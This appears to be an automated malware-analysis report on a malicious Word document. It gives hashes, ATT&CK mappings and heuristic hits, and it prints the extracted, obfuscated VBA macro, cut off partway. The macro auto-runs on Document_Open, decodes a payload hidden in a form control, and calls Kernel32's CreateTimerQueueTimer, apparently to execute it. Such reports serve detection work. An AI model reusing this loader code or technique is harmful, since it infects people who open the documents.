Office (OLE) malware analysis — malicious · 4496117aa7555cf4

MALICIOUS

Office (OLE)

297.0 KB Created: 2017-11-22 14:53:00 First seen: 2017-12-08

MD5: 6737edee478a31194af90cb7ce08ed8e SHA-1: 393214bbc7a9f55bb31eb8a645811d94e5e25d77 SHA-256: 4496117aa7555cf4ba422ed223c3c6527d94b0ae5d69f263bf756874000cd01c

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains a VBA macro with a Document_Open auto-execution function, indicating malicious intent upon opening. The macro employs obfuscation techniques and uses GetObject, suggesting it aims to download and execute a secondary payload. While the specific URLs extracted are benign, the presence of the macro and its execution pattern strongly suggest a malicious document designed for initial access via spearphishing.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10816 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10816 bytes
SHA-256: `34e0862698f96ab89445ad5d10bf498d940412f6df28e95e972f5fc7068d9f13`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function biradial(articulately) As String Dim allantoic(6962) As Byte Dim baroque As Long Dim chimakum As Long Dim despumate() As Byte Dim beanfeast As Long Dim harem(63) As Long Dim barbecue As Long Dim atelier(63) As Long Dim illdigested(63) As Long seeing = 39 - 80 + 65321 aneurysmal = 9 - 112 + 65639 bumper = 7 - 40 + 4129 ectoderm = 45 - 27 + 16711662 Dim capella() As Byte capella = VBA.StrConv(articulately, 128) cooks = 5 + 32 Pmt 0, cooks, 7585, 47529, 8 copaiba = 7840 + 3 finem = vbKeyShift - 12 For unauthoritative = (1 - 1) To copaiba * 1 If unauthoritative Mod (6 - 4) = (3 - 3) Then capella(unauthoritative) = capella(unauthoritative) - finem Else capella(unauthoritative) = capella(unauthoritative) - (finem - 1) End If Next unauthoritative sympathectomy = 11 + 51 Pmt 0, sympathectomy, 25280, 57587, 6 uncertain = 107 - 100 - 7 prionace = 80 - 3 - 34 archegenesis = abolishment For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5) atelier(beanfeast) = plebiscitum(beanfeast, bumper, 30 + 5) illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5) Next beanfeast breastfed = 39 + 9 Pmt 0, breastfed, 36651, 54834, 2 despumate = capella grampositive = 18 + 59 Pmt 0, grampositive, 12329, 36386, 3 northwestward = 122 - 24 - 95 enfranchised = 36 - 122 + 88 For barbecue = 0 To copaiba clay = despumate(barbecue) belay = despumate(barbecue + 2) baggala = atelier(archegenesis(despumate(barbecue + 1))) cupronickel = harem(archegenesis(belay)) + _ archegenesis(despumate(barbecue + northwestward)) baroque = illdigested(archegenesis(clay)) + baggala + cupronickel beanfeast = plebiscitum(baroque, ectoderm, 20 + 7) allantoic(chimakum) = plebiscitum(beanfeast, aneurysmal, 10 + 7) beanfeast = plebiscitum(baroque, seeing, 20 + 7) allantoic(chimakum + 1) = plebiscitum(beanfeast, (15 - 23 + 264), 10 + 7) allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7) chimakum = chimakum + enfranchised + 1 barbecue = barbecue + 3 Next biradial = allantoic End Function Function braze() unwelcome.hallucinogen.Value = Day(#12/5/2013#) Set aerobiotic = unwelcome.hallucinogen.SelectedItem symmetry = 51 + 44 Pmt 0, symmetry, 19244, 48842, 8 whim = aerobiotic.Name justly = 50 - 49 + 7843 crenulate = Right(whim, justly) hipless = biradial(crenulate) footwear = 40 + 48 Pmt 0, footwear, 13324, 17438, 6 #If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then Dim upbow As LongPtr Dim seedtime As LongPtr Dim ploy As LongPtr Dim fumble As LongPtr Dim pattern As LongPtr ramshead = 118 - 128 + 2074 #End If #If (14 * 4 + 6) > (9 - 4 * 2) And Not (99 - 11 * 9) * 30 < (Win64) Then Dim seedtime As Long Dim upbow As Long Dim ploy As Long Dim fumble As Long Dim pattern As Long ramshead = (14 - 25 + 792) + 3459 #End If adaptability = 21 + 13 Pmt 0, adaptability, 2073, 45246, 2 melicoccus = 20 + 37 Pmt 0, melicoccus, 29396, 52316, 4 antibacterial = hipless upbow = morder.malabo(antibacterial) ploy = 102 - 7 - 95 seedtime = upbow + ramshead fumble = 63 - 108 + 201572 pattern = 71 - 80 + 3509 balaenicipitidae = decapitate(fumble, _ ploy, seedtime, _ ploy, ploy, ploy, _ ploy) bonnet = 59 + 1 Pmt 0, bonnet, 13549, 52182, 5 End Function Private Sub Document_Open() remissness = "mate" braze canaliculated = 9 + 19 Pmt 0, canaliculated, 36418, 18210, 5 End Sub Attribute VB_Name = "soave" ' Es ist kalt und regungslos #If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then ' Die Nacht A¶ffnet ihren SchoAY ' Ich weiAY nicht wie du heiAYt Public Declare Function decapitate _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (etiolate As ... (truncated)

SHA-256: 34e0862698f96ab89445ad5d10bf498d940412f6df28e95e972f5fc7068d9f13

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function biradial(articulately) As String
Dim allantoic(6962) As Byte
Dim baroque As Long
Dim chimakum As Long
Dim despumate() As Byte
Dim beanfeast As Long
Dim harem(63) As Long
Dim barbecue As Long
Dim atelier(63) As Long
Dim illdigested(63) As Long
seeing = 39 - 80 + 65321
aneurysmal = 9 - 112 + 65639
bumper = 7 - 40 + 4129
ectoderm = 45 - 27 + 16711662
Dim capella() As Byte
capella = VBA.StrConv(articulately, 128)
cooks = 5 + 32
Pmt 0, cooks, 7585, 47529, 8
copaiba = 7840 + 3
finem = vbKeyShift - 12
For unauthoritative = (1 - 1) To copaiba * 1
If unauthoritative Mod (6 - 4) = (3 - 3) Then
capella(unauthoritative) = capella(unauthoritative) - finem
Else
capella(unauthoritative) = capella(unauthoritative) - (finem - 1)
End If
Next unauthoritative
sympathectomy = 11 + 51
Pmt 0, sympathectomy, 25280, 57587, 6
uncertain = 107 - 100 - 7
prionace = 80 - 3 - 34
archegenesis = abolishment
For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5)
atelier(beanfeast) = plebiscitum(beanfeast, bumper, 30 + 5)
illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5)
Next beanfeast
breastfed = 39 + 9
Pmt 0, breastfed, 36651, 54834, 2
despumate = capella
grampositive = 18 + 59
Pmt 0, grampositive, 12329, 36386, 3
northwestward = 122 - 24 - 95
enfranchised = 36 - 122 + 88
For barbecue = 0 To copaiba
clay = despumate(barbecue)
belay = despumate(barbecue + 2)
baggala = atelier(archegenesis(despumate(barbecue + 1)))
cupronickel = harem(archegenesis(belay)) + _
archegenesis(despumate(barbecue + northwestward))
baroque = illdigested(archegenesis(clay)) + baggala + cupronickel
beanfeast = plebiscitum(baroque, ectoderm, 20 + 7)
allantoic(chimakum) = plebiscitum(beanfeast, aneurysmal, 10 + 7)
beanfeast = plebiscitum(baroque, seeing, 20 + 7)
allantoic(chimakum + 1) = plebiscitum(beanfeast, (15 - 23 + 264), 10 + 7)
allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7)
chimakum = chimakum + enfranchised + 1
barbecue = barbecue + 3
Next
biradial = allantoic
End Function

Function braze()
unwelcome.hallucinogen.Value = Day(#12/5/2013#)
Set aerobiotic = unwelcome.hallucinogen.SelectedItem
symmetry = 51 + 44
Pmt 0, symmetry, 19244, 48842, 8
whim = aerobiotic.Name
justly = 50 - 49 + 7843
crenulate = Right(whim, justly)
hipless = biradial(crenulate)
footwear = 40 + 48
Pmt 0, footwear, 13324, 17438, 6
#If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then
Dim upbow As LongPtr
Dim seedtime As LongPtr
Dim ploy As LongPtr
Dim fumble As LongPtr
Dim pattern As LongPtr
ramshead = 118 - 128 + 2074
#End If
#If (14 * 4 + 6) > (9 - 4 * 2) And Not (99 - 11 * 9) * 30 < (Win64) Then
Dim seedtime As Long
Dim upbow As Long
Dim ploy As Long
Dim fumble As Long
Dim pattern As Long
ramshead = (14 - 25 + 792) + 3459
#End If
adaptability = 21 + 13
Pmt 0, adaptability, 2073, 45246, 2
melicoccus = 20 + 37
Pmt 0, melicoccus, 29396, 52316, 4
antibacterial = hipless
upbow = morder.malabo(antibacterial)
ploy = 102 - 7 - 95
seedtime = upbow + ramshead
fumble = 63 - 108 + 201572
pattern = 71 - 80 + 3509
balaenicipitidae = decapitate(fumble, _
ploy, seedtime, _
ploy, ploy, ploy, _
ploy)
bonnet = 59 + 1
Pmt 0, bonnet, 13549, 52182, 5
End Function
Private Sub Document_Open()
remissness = "mate"
braze
canaliculated = 9 + 19
Pmt 0, canaliculated, 36418, 18210, 5
End Sub

Attribute VB_Name = "soave"

'  Es ist kalt und regungslos
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  Die Nacht A¶ffnet ihren SchoAY
'  Ich weiAY nicht wie du heiAYt
Public Declare Function decapitate _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (etiolate As
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.